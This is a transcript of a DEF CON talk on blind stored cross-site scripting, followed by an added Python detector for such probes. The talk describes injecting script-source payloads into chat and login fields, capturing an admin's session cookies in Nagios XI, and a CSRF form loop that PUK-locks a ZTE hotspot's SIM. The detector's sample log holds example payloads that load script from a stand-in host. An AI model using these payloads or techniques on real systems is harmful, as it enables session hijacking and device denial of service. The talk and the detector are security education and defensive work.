All right, how's it going, everybody? Last talk for the day at DEF CON. You guys having fun? Drunk yet? It's like a hollocks. Fuck yeah. All right, so I'm Adam Baldwin. No, thank you. I am definitely not this Adam Baldwin; if you were here to see that Adam Baldwin, it is at the pool on the roof. So I'm this Adam Baldwin. I'm the chief security officer at &yet and security lead for its side brand, Lift Security, and I'm on Twitter at adam_baldwin. And we're gonna blow through a lot of slides. I've got 59 slides and 20 minutes plus two demos, so let's go fast. We're gonna talk about what blind cross-site scripting is, how I'm using it in penetration tests, some challenges with blind cross-site scripting, the introduction of the tool XSS.io (and I'll make it public after the talk), and some special surprises if I don't run over.

So what the fuck is blind cross-site scripting? Right, it seems like something I made up. I did, actually; I've seen it mentioned before, but it's really just a variant of cross-site scripting. So let's talk about cross-site scripting first, just to give people in the crowd who are unfamiliar with cross-site scripting a little overview. It comes in three variants, right: reflected, persistent (stored), or DOM. Reflected is where part of your query parameter is reflected back into the HTML and rendered in your browser. It's reflected basically back to the client sending it: it's getting the document, the document is getting manipulated and sent back and rendered. Persistent: that payload is getting stored somewhere, getting rendered back into the client, and then getting sent back to the client and rendered at a future point in time. And then DOM, where all of that is basically happening client-side; it's being manipulated client-side rather than the actual document or anything being stored. If you want to know more, there's plenty of information out there.
That's not what we're going to talk about. We're talking about a specific variant of persistent or stored cross-site scripting, right? And where I saw blind cross-site scripting mentioned first was an academic blog post from years back, but it's also known as authenticated XSS. Basically what we're doing with blind cross-site scripting is we're throwing a bunch of payloads out there into various inputs in the application, and we are looking to see if we get any response back.

So blind press... I'm just gonna stop saying that. Blonde cross-site... blind, blind. Ooh. It's a different challenge. It's not like blind SQL injection, where you actually get some type of immediate feedback: timing or response, alerts, whatever. You have no idea where your payload is going to end up. You don't know whether your payload is going to execute, or when. So you have to think ahead about what you want to accomplish with, basically, stored cross-site scripting, right? What do you actually want to get out of what you're doing? And the key piece here, and this is what XSS.io provides, is you have to be listening. You have to listen, and listen forever, because that input is going to persist someplace in some database, and at some point in time some developer is going to screw up and render that in some browser someplace, not properly encoded. It's going to happen. It happens all the time.

So what I like to think about blind cross-site scripting is it's the Carly Rae Jepsen of cross-site scripting attacks. It's "Call Me Maybe," right? You might get a call back. It's throwing stuff against the wall and thinking that it might actually call you back.

So let's take an example from a recent penetration test that I did that was completely black box. I only had access to the public-facing interfaces of all of their web applications, and I wanted to see basically how I could cross that barrier, that trust boundary, between the private admin customer service portal and the public-facing chat application.
So that's me. And basically what I did was I set up a chat session with a customer service rep, and included in that chat, in every single payload, in my name and description, in the body, I put uniquely tagged, basically, script payloads, right: script source equals some unique identifier. And that's all I did. I did a very simple, straightforward thing, and I went to see if they called back. It didn't. So the chat rep got this, and it was also stored into the database. I had no idea if they kept track of this stuff or not. It's just what I did. I threw this stuff out there and I left XSS.io listening.

And time passed, actually a couple of days. And our chat representative... this is what I surmise based on talking to the client: they've got a little search interface for their chats, and the customer service rep searched for something, and it pulled the payload out of the database and rendered it in her browser. Little evil payload there, and bazinga, right? We got a call back. So it rendered in her browser and sent me back information about that application. Not that exciting, but the fact that I now had a connection to her session, right? I was, for all intents and purposes, her, right? I knew where I could put input into the application. I knew it was the description field of that particular chat; none of the other fields triggered, just the description. And I knew exactly where I could put it to then send some other payload. Happy me.

So, steps to a successful XSS exploit with blind cross-site scripting: you have to carefully choose the right payload for the right situation, and you have to really, really get lucky. It's basically magic. You throw crap against the wall until, you know, it might stick. And the reason I say you have to pick the right payload is because if you go to, say, HTML5sec, you know, those guys have just piles of payloads that you can use in different variants.
There's just hundreds and thousands of different variants you can use. But if you think about it, why would I use, like, a CSS-type variant injection attack in a first name or a description field? I wouldn't. So that narrows down your payloads even more. What I found is just the most basic of payloads, just basically, you know, script source, is really, really effective in most situations. I tried a variant of, like, a Paros or a Burp proxy plug-in that basically, for every request I got, enumerated all of the different injection points and then did, you know, thousands of payloads, and the ones that came back were always the really, really simple ones. So I've just stopped doing it. I just use basically a few manual payloads, and it's really, really effective for me.

So plan on how your payload will be used in the application. Think about it. Where's a user agent being stored? Where are these various headers that your client is sending to the application going to be stored? How are they going to use it? How is it used in a reporting interface? If you think about those things, you'll be able to kind of plan what you want to actually inject. Will you be getting the context of a user that might have access to useful information? Is it an application you actually care about?
Those are some things to think about. Here's some nice targets that I found: log viewers that log headers, exception handlers, things like that, that log your request, your POST body, things like that. Customer service apps: chats, tickets, forums, anything moderated, anything you've got that crosses the trust boundary, where you've got any user that's going to be rendering in a different context.

And I don't know how that slide got in there, but I'll let you take it in, and if you want to play around, there might be something with this particular application. Got it? Okay.

So blind XSS management is a giant pain in the ass to deal with: generating unique identifiers for all these different payloads and keeping track of them. And so I basically wrote a tool. I was lazy. I wrote a tool. It's counterintuitive. So XSS.io can help. So what is the XSS.io tool? It's basically a tool to deal with cross-site scripting exploits. So sometimes you need all the space you can get. I'm gonna make XSS.io public so that anyone can create and have available payloads online at that domain and use them 24 hours a day. Basically it'll be up all the time, I hope. You don't need a short URL, and I'll demonstrate this: you don't actually need, like, XSS.io slash some unique identifier. Like, if you're using, you know, bit.ly in your payloads, you have an extra, like, five characters there for the GUID, and you don't have to have that, because we do some basically referer-based redirects, which I'm sure somebody here will find a way to break and ruin, but whatever. The exploit creator: it's snippets for common tasks, and you can quickly just create stacked-up exploits. Once you've found a vulnerability, you can weaponize it very quickly. And we've got the dead dropper, the blind XSS manager. It's a simple API.
You say, "I'm dropping this type of payload at this location," and it gives you an ID back, and that's all you need. And it's a quick, super fast API. It's built on top of Node and Redis. We can talk about architecture after the talk or whatever if you're interested.

So let's do a demo, if this works. We're gonna demo a vulnerability in Nagios Enterprise. Basically... okay, what the hell is that? Okay. So here's a quick tour, as fast as we can go. Snippets: snippets are basically reusable code blocks, right? They're literally just functions. That's all they are. A JavaScript function that does a thing and calls a callback, and that way we can stack them up. We can just say, do this really small thing, and do the next thing, and the next thing, and the next thing. You can chain them together. Load value by selector, as an example, is really useful for, say, finding a CSRF token from some page. Here's our exploit list. There's nothing there because I dumped the database before I came up here. And here's the exploit creator; we'll get into that in a second. Here's the redirect view and the dead drop.

So let's actually drop something in Nagios XI. So there's a configuration manager that you can access if it's public. Normally you have to be logged in to access it. What we'll do: I've actually got a little Firefox plug-in that I'll make public too. I don't have it quite polished yet. But let's say we want to get a drop for a username. I have username, get ID, paste it in there. It's the first one, right? It's one; it just increments up. Please don't drop a bunch of shit in XSS.io. Oh, does it work? And we're just gonna log in. Login fail, right? Great. But that got stored someplace; that got put into a log. So let's log into Nagios and actually trigger that. So if we look at dead drop, we got one dropped.
We don't care about anything that doesn't call back, so I don't bother showing anything or storing anything or whatever. It's not gonna... Nagios configuration manager. Okay, so if we happen to go to the config manager log, these happen to go in there. We've got, obviously, some injection happening here. And if we go back to the exploit list... please work. We actually got a call back. So it says that at nagios.example.com slash this URL, we put it in the username field. We actually get a bunch of data back, and this is horribly ugly. I'm trying to find a good way of representing this data, but it's difficult. I'm actually logging the entire HTML contents of the page, the source IP that called back, the window.location, the session cookies, all that stuff. It gets loaded, right?

So let's sort of weaponize this particular thing. So this is the page that called back, the window.location. And let's quickly... first thing we want to do is we want to create an exploit and say, okay, we're just gonna do the simple thing of finding the CSRF token of one of the pages, just because that's what we've got planned. So we can load a value by selector at a particular URL. This particular URL we want is... we'll load that URL. Our selector is our input box, and name equals nsp, and that returns a value. And let's just alert that value. And so this one snippet returns value, and we can just say, okay, I want to drag the return value of that into the input of this other snippet, and it goes. That's the generator right there.

Now let's go and... let's say we have limited space. So let's say we actually need every single character for XSS.io.
We can't have any trailing anything. Let's show the referer basically working in action as well. And so we're gonna add a redirect from that particular URL that gets loaded, and we're gonna redirect that to... of course I didn't copy the frickin'... in the exploit list we'll copy the unique identifier for that. And so we're gonna say, if anything comes into XSS.io from this referer, load this redirect into this page, basically load our payload, right? And that could be a BeEF hook. It doesn't have to be something from XSS.io. It could be whatever. You could load up XSS ChEF, you know, from koto. You can load up whatever you want. You can redirect into whatever. So let's save it. Pray this works. If it doesn't work, there's a space after that.

So now that we have that, let's go back and redrop. Let's just drop script source equals, and let's just do... so you can do a pretty small payload. And I'm actually logged in, but it still dumps it in there as a failed login. So we load up the log. We should get another... Oh, cool. It's not gonna work. That's what I get for doing a live demo. What's that? And when I dropped it, so it did a post back. Let's see. Let's bracket that: bracket and bracket. Oh man, the demo gods are pissed off at me. If I just keep reloading the page, right? So let's look, just quick. Aha, you don't need it. You don't need it: backslash backslash will use whatever the current protocol is, so you can make it even shorter. But no, I know what frickin' happened. This thing right here. It's a bug. I knew it was gonna bite me. It basically doesn't strip spaces. So I break things; I don't build them. Yeah, whatever.

Okay, so that's the failed demo. It should run. There's some bugs. I love contributions. I'm gonna make the code base public on GitHub and people can contribute. It needs some polish, but it's there. Like I said, whenever we were refreshing that log, these dead drops were calling back. So we got 18 events, and each individual time
it actually called back, we've got more events, more sessions, more whatever. How much time? All right, so that's blind cross-site scripting. That's XSS.io, again, some bugs. I'm not gonna debug the demo anymore. I have a special treat, however, that maybe will actually work. And if they both fail, that's great. I've got another tool to announce: CSRF.io, to basically deal with CSRF attacks. It's kind of a, you know... I gotta show my slide, because: but wait, there's more! Okay, so let's do this quick. CSRF.io is basically... you can create little scripts of CSRF-style attacks: submitting forms, loading content, whatever. Here's just a few that are out there, and you can make them public, whatever.

We are going to try... does anyone here have a ZTE 890? One of these? Anybody? Don't be shy, raise your hand, please. You have one? It's, um, yeah, ZTE 890, Verizon. Don't click on any link I send you. So this particular vulnerability is PUK-locking out the SIM, so you have to go get a new one if you do it too many times, right? So what I did was it submits the form to vz.hotspot, which this thing conveniently gives you, so even if you change the internal IP address, you can reliably hit the device every single time from the outside. Pause for X seconds, and let's redirect back to the URL. So all we're going to do is we're going to hit the form, hit the form, hit the form. What I was going to try to do is connect to it and see if it would actually kill it, but who knows if this thing will actually even work. 890... I've never fully tried this out, because I didn't want to break the device before I had to. Two F nine two, four A five... oh, don't join that. Okay, so here we are, online. Apparently that's the test. All right, so let's hit the exploit URL and see what actually happens, see if it actually does it. Incorrect PUK code, huh? Cool. If you get the timing down right, that doesn't pop up. So if you can short it out...
Yes, it's connected to it. Keeps refreshing. The timing might not be right, but it will keep repeating the form over and over and over again. If I could actually connect to it, it would check the count. Anyway, it's a useful tool. You can literally copy the request/response right from, like, Firebug or something and drop it into CSRF.io, have a form and submit the request, and at that point it's out there in public and you can send the link. So, basically a couple of horribly failable demos. And, oh, this came up. I don't have internet. Hey, that didn't fail. And that's it.
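As an added example (not XSS.io or any of the speaker's code), here is a small Python detector from the defender's side of the talk: it flags the kind of minimal external script-source probes the speaker drops into usernames, chat descriptions and headers when they turn up in stored log entries, and shows the output encoding that keeps a log viewer from executing them. The log lines are constructed and the callback host `xss.example` is a placeholder.

```python
"""Flag blind-XSS probes in stored user input and render that input safely.

Constructed example for illustration; not XSS.io or the speaker's code.
"""
import html
import re
from typing import Dict, List

# A blind-XSS probe is usually a bare <script src=...> pointing at a listener the
# tester controls. The talk notes that '//host/id' (protocol-relative) is the short
# form, so match http://, https:// and bare // alike. Group 1 is the callback host;
# it is absent for inline <script> bodies, which are still flagged.
SCRIPT_RE = re.compile(
    r"<\s*script\b(?:[^>]*?\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>]+))?",
    re.IGNORECASE,
)

# Constructed entries modelled on the sinks the talk names: failed-login usernames,
# chat descriptions and request headers that later land in a log viewer.
SAMPLE_LOG: List[str] = [
    'login_failed user="<script src=//xss.example/1></script>" ip=198.51.100.7',
    'login_failed user="alice" ip=198.51.100.8',
    "chat_created desc=\"Need help <SCRIPT SRC='https://xss.example/2'></SCRIPT>\"",
    'request ua="Mozilla/5.0 <script>alert(1)</script>" path=/',
    'request ua="Mozilla/5.0 (X11; Linux)" path=/login',
]


def find_probes(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line containing a script tag; callback_host is ''
    for inline scripts and the lower-cased host for external-source probes."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        m = SCRIPT_RE.search(line)
        if m:
            findings.append({"line": n, "callback_host": (m.group(1) or "").lower()})
    return findings


def render_field(value: str) -> str:
    """HTML-encode a stored value before an admin or log page shows it. This is the
    missing step the talk points at ('not properly encoded'): the probe becomes text."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for f in find_probes(SAMPLE_LOG):
        host = f["callback_host"] or "(inline script)"
        print(f"line {f['line']}: script from {host}")
    print(render_field(SAMPLE_LOG[0]))
```

Running the detector over a real log export gives you the callback hosts to block at the egress proxy and the fields whose rendering path needs the encoding fix.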